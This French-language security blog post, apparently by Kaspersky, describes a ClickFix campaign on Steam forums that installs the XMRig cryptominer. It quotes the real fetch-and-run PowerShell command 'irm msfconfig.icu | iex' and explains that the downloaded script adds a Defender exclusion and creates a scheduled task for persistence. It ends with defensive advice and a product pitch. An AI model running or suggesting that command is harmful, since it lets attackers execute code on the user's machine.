Cette année a été marquée par une véritable recrudescence des attaques ClickFix. Cette technique remporte un tel succès auprès des criminels que nous avons à peine le temps de terminer un article sur une variante qu’il est déjà temps de passer à la suivante. Cette fois-ci, les pirates informatiques s’en prennent aux joueurs : des journalistes spécialisés dans les technologies ont découvert des messages publiés sur les forums de Steam diffusant des conseils malveillants.

Voici à quoi ressemblent ces publications, quels programmes malveillants elles servent à propager et comment protéger votre appareil. ClickFix débarque sur les forums Steam De nombreux joueurs se tournent vers leurs pairs sur les forums Steam pour obtenir de l’aide et des conseils, notamment pour venir à bout d’une quête difficile, gagner des niveaux, décrocher le meilleur butin ou résoudre un bug. Et c’est précisément cette confiance dans les conseils de la communauté que les pirates informatiques ont décidé d’exploiter.

L’attaque commence lorsque des cybercriminels répondent à la question d’un utilisateur concernant des plantages dans un jeu, des objets manquants dans l’inventaire ou d’autres problèmes techniques. Sous couvert de commentaires bienveillants, ils suggèrent d’ouvrir PowerShell en tant qu’administrateur et d’exécuter une commande censée résoudre le problème rencontré par l’utilisateur. En camouflant un message de dépannage, l’acteur malveillant suggère de lancer PowerShell en tant qu’administrateur et d’exécuter une commande censée résoudre le problème de l’utilisateur.

Source Comme vous pouvez vous en douter, l’exécution de cette commande ne résout rien : elle ne fait qu’ouvrir une nouvelle boîte de Pandore. C’est là tout le principe de ClickFix : recourir à l’ingénierie sociale pour amener les victimes à effectuer elles-mêmes des actions dangereuses, tout en fournissant aux escrocs ce dont ils ont besoin pour compromettre l’appareil. Nous avons déjà abordé d’autres méthodes ClickFix, telles que les faux CAPTCHA, les fausses erreurs de navigateur et bien d’autres encore, qui consistent toutes à amener la victime à exécuter elle-même la commande malveillante.

Pour en savoir plus sur les différentes variantes des attaques ClickFix, consultez notre article précédent. Le problème avec l’utilisation de ClickFix sur les forums Steam, c’est que l’attaque peut toucher non seulement le joueur qui a demandé de l’aide, mais aussi de nombreux autres joueurs qui rencontrent le même problème et trouvent la réponse via une recherche Google. Introduction rapide : ce qui se cache réellement derrière la commande irm | iex Avant d’aborder les méthodes utilisées par les pirates pour inciter les joueurs à installer ce logiciel, il convient de rappeler quelques notions techniques.

Donc, pour commencer, les messages publiés sur les forums de Steam conseillent aux victimes potentielles, qui ne se doutent de rien, d’exécuter la commande suivante dans PowerShell : irm msfconfig.icu | iex Pour quelqu’un qui ne connaît pas très bien PowerShell, cette commande peut sembler assez inoffensive : elle ressemble au lancement de MSConfig, l’utilitaire de configuration système intégré à Windows, avec quelques paramètres supplémentaires. En réalité, cependant, cette commande est tout sauf inoffensive. Voyons en détail ce que fait réellement chaque partie de cette commande : irm est l’abréviation de la commande intégrée PowerShell Invoke-RestMethod.

Elle contacte l’adresse Web indiquée plus loin dans la ligne et récupère les données en réponse. icu correspond à cette adresse Web, et non au nom d’un fichier local, comme on pourrait le croire à première vue. C’est le serveur du pirate informatique, et il répond à la requête irm en envoyant un script PowerShell malveillant. iex est une autre commande PowerShell intégrée, Invoke-Expression. Elle prend tout ce que la requête irm reçoit de cette adresse Web et l’exécute sous forme de code PowerShell.

Une fois exécutée, cette ligne de code PowerShell télécharge un script depuis le site indiqué et l’exécute immédiatement. Comme l’a justement souligné un utilisateur de Reddit, il est possible de savoir en toute sécurité quel code serait effectivement téléchargé sur votre appareil, sans risque qu’il s’exécute, simplement en supprimant la deuxième partie, iex. Sans elle, la commande se contentera de télécharger le contenu du script et de l’afficher dans la fenêtre PowerShell sans l’exécuter.

Vous disposerez ainsi du code complet et non masqué que l’on vous demande d’exécuter sur votre appareil. Voyons maintenant ce que ces membres si serviables des forums Steam essaient en réalité de faire installer aux joueurs sur leurs machines. Un mineur de cryptomonnaies, pas un outil d’optimisation Les pirates ont bien préparé leur coup : le script PowerShell téléchargé depuis leur serveur imite de manière très convaincante un utilitaire d’optimisation Windows.

Une fois lancé, il affiche à l’utilisateur une série de notifications indiquant qu’il va supprimer les fichiers temporaires, vider le cache DNS, mettre à jour les pilotes, vérifier l’intégrité du disque, désactiver les applications de démarrage inutiles, analyser le système à la recherche de programmes malveillants, réparer l’image Windows et vérifier l’intégrité des fichiers système. Le script affiche un flux de messages concernant diverses fausses tâches d’optimisation pour donner l’impression qu’il effectue une maintenance utile. Source En réalité, c’est en coulisses que tout se passe.

Le script commence par vérifier s’il est exécuté avec des droits d’administrateur. Si c’est le cas, il crée un dossier de travail masqué à l’emplacement C:\Windows\Background et l’ajoute à la liste d’exclusion de Microsoft Defender. À partir de ce moment-là, les fichiers placés dans ce dossier ne sont plus analysés par l’antivirus intégré à Windows.

Ensuite, le script prépare le système pour la prochaine étape de l’attaque et télécharge un fichier exécutable à partir du serveur des pirates, qu’il enregistre dans ce même dossier C:\Windows\Background sous le nom, en apparence légitime, de system.exe. Le fichier téléchargé est XMRig, l’un des outils les plus populaires pour le minage de la cryptomonnaie Monero. XMRig n’est pas en soi un programme malveillant, mais un outil de minage légitime et open source.

Le problème vient du fait que des pirates informatiques l’installent sur les ordinateurs des victimes à leur insu. Une fois que le logiciel est lancé, le pouvoir de calcul de l’appareil est détourné pour servir au minage de Monero, et la cryptomonnaie ainsi obtenue profite directement aux cybercriminels. Les ordinateurs des joueurs sont donc des cibles particulièrement attrayantes, car les PC de jeu modernes sont équipés de cartes graphiques et de processeurs puissants – le type même de matériel idéal pour le minage de cryptomonnaies.

Pour s’assurer que le programme malveillant survive à un redémarrage, le script crée également une nouvelle tâche dans le planificateur de tâches de Windows : XMRig-{nom de l’ordinateur}. Dès lors, il lance automatiquement le mineur de cryptomonnaies à chaque démarrage du système. Comment protéger votre appareil contre les mineurs de cryptomonnaies et les autres programmes malveillants Malheureusement, de nombreux joueurs hésitent à installer un logiciel de sécurité, ou à le laisser activé, sur leurs appareils.

Le principal responsable est le mythe tenace selon lequel » un antivirus ralentit les jeux « . Nous avons déjà abordé ce sujet sur notre blog, et les résultats ont montré que l’utilisation d’un antivirus pendant une partie n’entraînait aucune perte de performances notable. On ne peut toutefois pas en dire autant des mineurs de cryptomonnaies : ils nuisent indéniablement aux performances et, qui plus est, ils usent plus rapidement votre matériel.

Alors, que peut-on faire pour protéger son PC de jeu et ses comptes ? Évitez d’exécuter des scripts PowerShell, Terminal ou tout autre script d’invite de commande que des inconnus vous suggèrent de copier et d’exécuter, que ce soit sur des forums, dans des discussions en ligne ou dans des commentaires. Avant d’appuyer sur la touche Entrée pour exécuter une commande que vous ne comprenez pas totalement, vérifiez ce qu’elle fait et les conséquences possibles de son exécution.

Utilisez une solution de sécurité fiable dotée d'un mode Jeux qui détectera à temps les tentatives de téléchargement de programmes malveillants et empêchera leur exécution. Ne désactivez pas la protection pendant que vous jouez. Le mieux est d’opter pour une solution dotée d’un mode Jeux dédié.

Les produits de sécurité Kaspersky activent automatiquement ce mode dès le lancement d’un jeu, suspendant ainsi les mises à jour de la base de données antivirus, les notifications et les analyses de disque programmées jusqu’à ce que vous ayez terminé de jouer. Envie de découvrir les autres techniques employées par les cybercriminels pour cibler les joueurs ? Consultez nos autres articles : Stealka Stealer : le nouveau visage des triches, mods et piratages dans les jeux vidéo Vulnérabilité dans le moteur de jeu Unity Les joueurs dans le collimateur : des programmes malveillants sur des sites officiels Arcane Stealer au lieu de tricheries Minecraft Avis aux joueurs : les chevaux de Troie ont envahi Steam